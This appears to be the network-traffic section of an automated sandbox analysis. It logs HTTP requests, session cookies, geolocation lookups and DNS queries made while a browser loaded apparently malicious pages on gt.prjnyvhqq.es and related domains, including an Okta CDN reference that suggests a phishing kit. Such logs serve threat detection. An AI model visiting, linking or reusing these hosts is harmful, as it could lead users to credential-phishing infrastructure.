                Source: global trafficHTTP traffic detected: GET /qrRFwXbevZEvnVMAiUx7UvsVvR0ghZ3dwRujkZwN45137 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrkpOyjOiDunHXziFGZrOWjZdbTejVnEICa8M12dnySKzi2ytGQDXno0L7zv5Gw0Rcd240 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /opaoRhBjUgHiIoaCKfIezzzWoVkJqtK30HJghd3t16wd98Kwq3Lsex6f6R62cd197 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /uvYNdT4TjRgRLErGCQMLf6xakoKmlmnqkwEY7rIwL97aNffM1Fw7tSWolcDFXUWbBYAHef255 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /yzQ7WQ1WS103WLJUON9XEhz9rsLHCpu997FrOW4sdEIKab180 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /mnKYewUy2Erp7R0vU2rSXaMo7Cq7klTDYuB2MBcvhu2iC2jn90145 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klnbyrX5mgR6oOR29lBToSlNE2NGVwxkoZOideivFRicbZu8Yg56170 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://gt.prjnyvhqq.esSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gt.prjnyvhqq.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /qrkpOyjOiDunHXziFGZrOWjZdbTejVnEICa8M12dnySKzi2ytGQDXno0L7zv5Gw0Rcd240 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijjoQp1oxSOnXEcvEdrNB8yaA6DF8mn5FECCpjHp1oZF4pjgrN12205 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /uvYNdT4TjRgRLErGCQMLf6xakoKmlmnqkwEY7rIwL97aNffM1Fw7tSWolcDFXUWbBYAHef255 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InlpeDNEZkE5N1NHL0x1WmZOdU9kNlE9PSIsInZhbHVlIjoiaytLRlkycVZXajhBYXV1K1pFWnA1TTlQQm1KZzFUc09LS0xKY2I0VEwzUDlKeGFuUHVYVjZaNEhBNTRjeUZvamRUUTNyVmtkTVl3cTRxVEJvbk9rL1VlNXp4ZWFUMllXd2s3enlDT2QvL2w3TUNIc0VtZ1hCc2ZjWVBSdE5GRmgiLCJtYWMiOiIzYTIzMjE0ZmJkZjI0NjU5OGZiMTdiM2NmZTYyMTQ1MDk1M2ZlYjQ5Njk5ODY3N2ZhODhjODFiOTZiNzE2ZDcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVzSWllV05seTE5cnBzZDZLWStYcVE9PSIsInZhbHVlIjoiTkhVUHZ3aFBvZitVUkRGYnNXSDNhbGYvUW02c0dPN1A4SXBQOG5HdklHdGkzdFpaTFlQV29OTmp4amNNcXBjTWQ4QjZRYkczQysrVG55SVh1TXZQMWlOSEFrTkR3Z3VubE9xK0J1K2hzQ1hKaTF1bCsxL0dWVW5NSkkzVCtrZ1YiLCJtYWMiOiJkYjA4ZmFhNGFiNjYxNTY3NmM1MmVlNzIzY2FiYTJhMzAyZjI4YWZkZTZjOTNiMWM1MjhjM2FmNTY3NjkxNjBhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /15134820007559038474282kslViqqXUXCWNLUXZPUGDZSVMFPKISJDCRSQGIOHRLEPrsRji4h5RxUaxPas345jhPwx40 HTTP/1.1Host: to07jtdrnkvvlfixseyblmkqfso2yre7fyuwqvz80dw95wnkqakicr.freyaxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficDNS traffic detected: DNS query: gt.prjnyvhqq.es
                Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: m60ri.kdyukk.ru
                Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: github.com
                Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
                Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                Source: global trafficDNS traffic detected: DNS query: get.geojs.io
                Source: global trafficDNS traffic detected: DNS query: to07jtdrnkvvlfixseyblmkqfso2yre7fyuwqvz80dw95wnkqakicr.freyaxw.es
                Source: unknownHTTP traffic detected: POST /report/v4?s=ed5L1%2FLysQ8gJoqySpy0a4hGi%2FZ5xg33ouiM3hZ39BGpxd%2FHLx%2F%2FjKh5%2BJuypDGrEA1gQna0kDWgGGV2Ar0%2BeMHPbwnsFUej%2B95OiUMocL%2BEoC3ZBTWnu69Ydb%2BRhfUx5qB9 HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 455Content-Type: application/reports+jsonOrigin: https://gt.prjnyvhqq.esUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 12:23:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ed5L1%2FLysQ8gJoqySpy0a4hGi%2FZ5xg33ouiM3hZ39BGpxd%2FHLx%2F%2FjKh5%2BJuypDGrEA1gQna0kDWgGGV2Ar0%2BeMHPbwnsFUej%2B95OiUMocL%2BEoC3ZBTWnu69Ydb%2BRhfUx5qB9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=417&min_rtt=417&rtt_var=156&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=2264&delivery_rate=9674641&cwnd=252&unsent_bytes=0&cid=8841bf92770f88f4&ts=14&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 925e611c69df41fe-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=97147&min_rtt=96935&rtt_var=20776&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1925&delivery_rate=38149&cwnd=232&unsent_bytes=0&cid=c2ae387311c5e09f&ts=260&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 12:23:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MERWaWDRD6ug1UBv76MBwJ16PQ7srMbYgd6NIHKsuzlrQHyELujbA9gjxvDFx2%2F8zCyqs5GIhQUW6lPYzvRc0f%2BEtVcuwxPE2zA0NiG27XFf1iB6%2FVzGdrHe%2F%2FC24JFRvAeb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=18664&min_rtt=18663&rtt_var=7001&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=2051&delivery_rate=216557&cwnd=221&unsent_bytes=0&cid=833e4f46df214ff2&ts=319&x=0"Server: cloudflareCF-RAY: 925e61dc1c6ce56c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=97463&min_rtt=97423&rtt_var=20584&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1712&delivery_rate=38211&cwnd=236&unsent_bytes=0&cid=9517a97e306076b5&ts=631&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 12:23:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JL8MdhjOEGS5jSNFg3N%2BwO3hBOrDyqOCZGS%2B3grA%2F2H1wOW8uJNrvm%2FuVRNyIO71coBZjvupRJpQit8Pnf51uY8Nx5hyqtwekve9hBGt7ZrHDG7TLVTuNTPkIz2hkuhrTTiJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=18412&min_rtt=18409&rtt_var=6909&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=2064&delivery_rate=219389&cwnd=253&unsent_bytes=0&cid=a3905977c0423b92&ts=314&x=0"Server: cloudflareCF-RAY: 925e61e5bf9c43ab-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=100413&min_rtt=97999&rtt_var=24309&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1723&delivery_rate=35353&cwnd=224&unsent_bytes=0&cid=155d312a0c92f84f&ts=639&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 12:24:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HqXjkqLHQQScVrmPAqr5tLyYnc%2Fghcb6d0QShCAGRYXIVABp0k4QnhZ3I8FMEdU91Nz1Ymwk%2FxyLfNv2O0oKLMJ0XBAVbzxQkux%2FM48rw55f7IpkzDRy%2BIZk6ylU%2Fe%2FJA6wg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=429&min_rtt=428&rtt_var=163&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=2084&delivery_rate=9211845&cwnd=252&unsent_bytes=0&cid=8ab01fc8df0cd10d&ts=170&x=0"Server: cloudflareCF-RAY: 925e61f79b64f9a9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=98642&min_rtt=98285&rtt_var=21272&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1744&delivery_rate=37489&cwnd=234&unsent_bytes=0&cid=84d448b884552b8a&ts=1119&x=0"
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
